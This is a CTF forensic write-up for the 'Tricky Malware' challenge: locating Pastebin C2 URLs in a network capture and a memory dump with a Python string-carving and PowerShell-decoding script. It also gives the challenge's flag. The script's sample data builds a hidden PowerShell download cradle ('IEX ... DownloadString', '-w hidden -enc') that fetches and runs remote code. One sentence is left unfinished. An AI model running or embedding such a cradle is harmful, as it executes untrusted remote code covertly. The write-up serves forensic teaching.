Wargames.MY CTF 2024 — Forensic: Tricky Malware (481 pts)

Overview

Analyzing malware evidence — a memory dump and network capture — to identify C2 infrastructure.

Hint: The malware seems to be trying to establish a connection to mothership. I wonder where it is.

Solution

1. Network Analysis

Opening network.pcap in Wireshark reveals connection attempts to Pastebin, indicating that’s where the C2 URL is hosted.

2. Memory Forensics

Searching the memory dump for Pastebin-related strings uncovers an obfuscated PowerShell command that:

One of the Pastebin URLs pointed directly to the flag: https://pastebin.com/raw/PDXfh5bb
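The two steps above boil down to one workflow: carve printable strings out of the dump in both encodings PowerShell leaves behind (ASCII on a command line, UTF-16LE inside the process heap), find anything pointing at pastebin.com, and decode any encoded command so that the URL hidden inside it surfaces too. The script below is an added example written for this writeup, not the author's tooling or the challenge files. It assumes the obfuscation is PowerShell's `-EncodedCommand` form (Base64 of UTF-16LE script text), which the writeup does not confirm, and it runs against a small constructed stand-in for the memory dump; the paste ID `AbCd1234` inside the encoded command is hypothetical, while the second URL is the one the writeup names.

```python
import base64
import re
from typing import Iterator, List, Optional

# Pastebin raw URLs as they appear in PowerShell download cradles.
PASTEBIN_URL = re.compile(r"https?://(?:www\.)?pastebin\.com/raw/[A-Za-z0-9]+")
# powershell.exe -e / -enc / -EncodedCommand <base64>  (case-insensitive)
ENC_CMD = re.compile(r"(?i)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})")


def extract_strings(blob: bytes, min_len: int = 6) -> Iterator[str]:
    """Yield printable ASCII strings, then UTF-16LE strings, from raw memory.

    PowerShell's .NET strings live in memory as UTF-16LE, so an ASCII-only
    `strings` pass would miss a URL that was only ever held as a .NET string.
    """
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob):
        yield m.group().decode("ascii")
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, blob):
        yield m.group().decode("utf-16-le")


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand blob (Base64 over UTF-16LE text).

    Returns None for anything that is not valid Base64 or not valid UTF-16LE,
    so random Base64-looking strings carved from the dump are skipped quietly.
    """
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_pastebin_urls(blob: bytes, max_depth: int = 3) -> List[str]:
    """Return every Pastebin raw URL reachable from the dump, in discovery order.

    Encoded commands are decoded and rescanned (bounded by max_depth, since a
    decoded command may itself launch another encoded PowerShell instance).
    """
    found: List[str] = []

    def scan(text: str, depth: int) -> None:
        for url in PASTEBIN_URL.findall(text):
            if url not in found:
                found.append(url)
        if depth < max_depth:
            for b64 in ENC_CMD.findall(text):
                decoded = decode_encoded_command(b64)
                if decoded:
                    scan(decoded, depth + 1)

    for s in extract_strings(blob):
        scan(s, 0)
    return found


def build_sample_dump() -> bytes:
    """Constructed stand-in for the memory dump (NOT the challenge's file).

    It contains an ASCII command line with an encoded download cradle pointing
    at a hypothetical paste, plus the writeup's URL stored as a UTF-16LE string.
    """
    script = ("IEX (New-Object Net.WebClient)"
              ".DownloadString('https://pastebin.com/raw/AbCd1234')")  # hypothetical paste ID
    enc = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    cmdline = f"powershell.exe -nop -w hidden -enc {enc}".encode("ascii")
    utf16_url = "https://pastebin.com/raw/PDXfh5bb".encode("utf-16-le")
    noise = b"\x00\x90\xfe\xff" * 16  # non-printable filler between artefacts
    return noise + cmdline + noise + utf16_url + noise


if __name__ == "__main__":
    for url in find_pastebin_urls(build_sample_dump()):
        print(url)
```

Against a real dump, replace `build_sample_dump()` with `open("memory.dmp", "rb").read()` (or a Volatility `windows.cmdline` / `windows.pslist` dump of the PowerShell process) and cross-check the hits against the hostnames seen in the pcap; a URL that appears only inside a decoded command, never as plaintext, is the one a plain `strings | grep pastebin` would have missed.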

Flag

WGMY{8b9777c8d7da5b10b65165489302af32}